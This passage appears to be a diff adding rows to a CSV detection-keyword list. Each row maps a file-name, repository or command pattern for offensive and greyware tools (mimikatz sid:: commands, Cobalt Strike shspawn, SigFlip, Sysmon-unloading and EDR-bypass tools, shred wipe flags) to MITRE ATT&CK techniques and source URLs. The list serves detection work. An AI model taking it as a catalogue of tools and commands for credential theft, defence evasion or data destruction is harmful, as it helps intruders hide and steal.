+"*Shhmon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*Shhmon.exe*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z"
+"*Shhmon.git*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z"
+"*shinject *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*shinject.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*shinject_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*shocknawe.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*Shodan.io*","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*shodanp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*ShorSec/DavRelayUp*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z"
+"*ShorSec/DllNotificationInjection*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*ShorSec/ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
+"*Show-TargetScreen.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*shred --remove*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*shred -u*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*shred -z*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*shred --zero*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*shspawn x64 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*shspawn x86 *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*shucknt.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z"
+"*ShuckNT-main*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z"
+"*ShutdownRepo/pywhisker*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
+"*ShutdownRepo/smartbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*sid::add*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sid::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sid::lookup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::patch*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::query*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sigflip*/Bof/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.exe -*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.WinTrustData*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*Sigloader *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader/sigloader.c*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*signal2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Signal-Labs/NtdllUnpatcher*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*SigPloit*","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling 
